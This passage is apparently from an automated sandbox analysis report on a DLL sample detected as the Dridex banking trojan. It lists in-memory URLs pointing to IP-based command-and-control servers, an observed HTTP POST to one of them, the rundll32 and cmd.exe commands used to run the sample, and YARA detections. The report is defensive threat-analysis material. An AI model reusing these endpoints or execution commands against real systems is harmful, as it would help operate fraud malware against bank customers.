                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/q
                      Source: rundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/x
                      Source: rundll32.exe, 00000003.00000003.675255963.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/z
                      Source: rundll32.exe, 00000003.00000003.487957725.000000000073F000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/~
                      Source: loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.823680145.000000000073D000.00000004.00000001.sdmpString found in binary or memory: https://182.46.210.220/
                      Source: loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpString found in binary or memory: https://183.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.499876344.00000000015BF000.00000004.00000001.sdmp, rundll32.exeString found in binary or memory: https://185.56.219.47/
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/R
                      Source: rundll32.exe, 00000003.00000003.493682410.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/c
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.496791595.00000000015BF000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.744898408.00000000015C0000.00000004.00000001.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.496791595.00000000015BF000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/$
                      Source: rundll32.exe, 00000003.00000003.554460856.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/-
                      Source: loaddll32.exe, 00000000.00000003.577869805.00000000015B8000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/.
                      Source: loaddll32.exe, 00000000.00000003.535107117.00000000015B7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.490150806.0000000000713000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/0
                      Source: loaddll32.exe, 00000000.00000003.577869805.00000000015B8000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4.140.214:808/
                      Source: rundll32.exe, 00000003.00000003.489963534.000000000073E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/5
                      Source: loaddll32.exe, 00000000.00000003.677056521.00000000015B8000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/?
                      Source: loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.657662148.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/D
                      Source: loaddll32.exe, 00000000.00000003.845510085.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ES
                      Source: loaddll32.exe, 00000000.00000003.796127425.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.554532651.0000000000714000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Ps%
                      Source: loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpString found in binary or memory: https://185.56.219.47:8116/V
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/fW
                      Source: loaddll32.exe, 00000000.00000003.704163950.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/l
                      Source: loaddll32.exe, 00000000.00000003.496791595.00000000015BF000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/llt
                      Source: rundll32.exe, 00000003.00000003.675255963.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/oft
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.789649850.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.857089400.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: loaddll32.exe, 00000000.00000003.771239473.00000000015B9000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.643498915.00000000015B8000.00000004.00000001.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: rundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/&
                      Source: loaddll32.exe, 00000000.00000003.771239473.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/)
                      Source: rundll32.exe, 00000003.00000003.616107262.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/-
                      Source: rundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/0y
                      Source: loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/5
                      Source: rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/56.219.47:8116/
                      Source: rundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.711929481.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/;
                      Source: loaddll32.exe, 00000000.00000003.771239473.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.554460856.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/C
                      Source: loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: rundll32.exe, 00000003.00000002.874095121.00000000006C0000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/G
                      Source: loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/GlobalSign
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/O
                      Source: rundll32.exe, 00000003.00000003.493682410.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Q
                      Source: rundll32.exe, 00000003.00000002.874111999.00000000006CA000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/S
                      Source: rundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/V
                      Source: loaddll32.exe, 00000000.00000003.845510085.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/W
                      Source: loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/Y
                      Source: loaddll32.exe, 00000000.00000003.796127425.00000000015B9000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.677056521.00000000015B8000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.806745321.000000000073D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: rundll32.exe, 00000003.00000003.823680145.000000000073D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dllu
                      Source: rundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dlluKZ
                      Source: rundll32.exe, 00000003.00000003.599520556.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dllusZ
                      Source: rundll32.exe, 00000003.00000003.527805201.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/c
                      Source: loaddll32.exe, 00000000.00000003.618838198.00000000015B8000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/coro8
                      Source: loaddll32.exe, 00000000.00000003.796127425.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/d
                      Source: loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.874111999.00000000006CA000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/en-US
                      Source: rundll32.exe, 00000003.00000003.742742966.000000000073E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.711929481.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/graphy
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/j
                      Source: loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/n
                      Source: rundll32.exe, 00000003.00000003.742742966.000000000073E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/nd
                      Source: rundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: rundll32.exe, 00000003.00000003.742742966.000000000073E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/r
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: rundll32.exe, 00000003.00000003.490150806.0000000000713000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/A
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/g
                      Source: loaddll32.exe, 00000000.00000003.499876344.00000000015BF000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/n
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/p
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.519473645.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: rundll32.exe, 00000003.00000003.527805201.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/-
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/
                      Source: rundll32.exe, 00000003.00000003.823680145.000000000073D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000003.00000003.487957725.000000000073F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/08/
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/3
                      Source: loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/6/
                      Source: rundll32.exe, 00000003.00000003.657662148.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/C
                      Source: rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.781390646.000000000073D000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.848659607.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000003.00000003.711929481.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Q
                      Source: loaddll32.exe, 00000000.00000003.508139529.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/der
                      Source: rundll32.exe, 00000003.00000003.542087598.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/der-
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/g
                      Source: rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.554460856.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.865409287.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/n
                      Source: rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/u
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.711929481.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://452.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.853804872.00000000015B8000.00000004.00000001.sdmpString found in binary or memory: https://455.56.219.47:8116/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0139F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:50129 version: TLS 1.2
                      Source: loaddll32.exe, 00000000.00000002.872614352.000000000154B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 3.3.rundll32.exe.62db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.dfdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c1db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4b1db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.62db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.dfdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.128db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4b1db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.128db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c1db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6efe0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6efe0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.467247040.0000000004B00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.433688939.0000000004C00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.888568308.000000006EFE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.478698643.0000000001270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.898148863.000000006EFE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.435699567.0000000000610000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.475590656.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFE51A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF67C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F003B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFB6F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF8EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F009B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFF6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFE6AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF96D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F001730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF8AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFAE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFE9E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF9E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFA660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F007FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFECA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFE3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F00FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F000220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F00D620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF83C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF7FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F001240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F007660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F002E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF5B60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFBF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0026B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F001EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F003EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F00FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0062F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF98DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFEACD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFA0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF88C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF8CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFE0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F00D180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFD030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0089F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0071F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F001020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFFDD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFEF9A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFC590
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFFD980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFE1570
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF7564
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F004CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0050A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F00DCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F005CB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0074096F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0074096F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00746845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00746845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_007462A6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_007462A6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0074096F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0074096F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00746845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00746845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_007462A6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_007462A6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFF22A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F00BE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllReversingLabs: Detection: 18%
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal88.bank.troj.evad.winDLL@11/0@0/4
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.19927Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.906753270.000000006F0A7000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.905694712.000000006F0A7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.8232.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_014AC7B8 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740361 push ss; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740361 push ss; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00746A2B push 00000078h; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00746A2B push 00000078h; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00741ED7 push cs; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00741ED7 push cs; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740FA7 push ds; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740FA7 push ds; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0074149A push eax; retf 006Ch
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0074149A push eax; retf 006Ch
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740B87 push ds; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740B87 push ds; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740361 push ss; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740361 push ss; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00746A2B push 00000078h; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00746A2B push 00000078h; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00741ED7 push cs; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00741ED7 push cs; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740FA7 push ds; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740FA7 push ds; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0074149A push eax; retf 006Ch
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0074149A push eax; retf 006Ch
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740B87 push ds; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00740B87 push ds; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
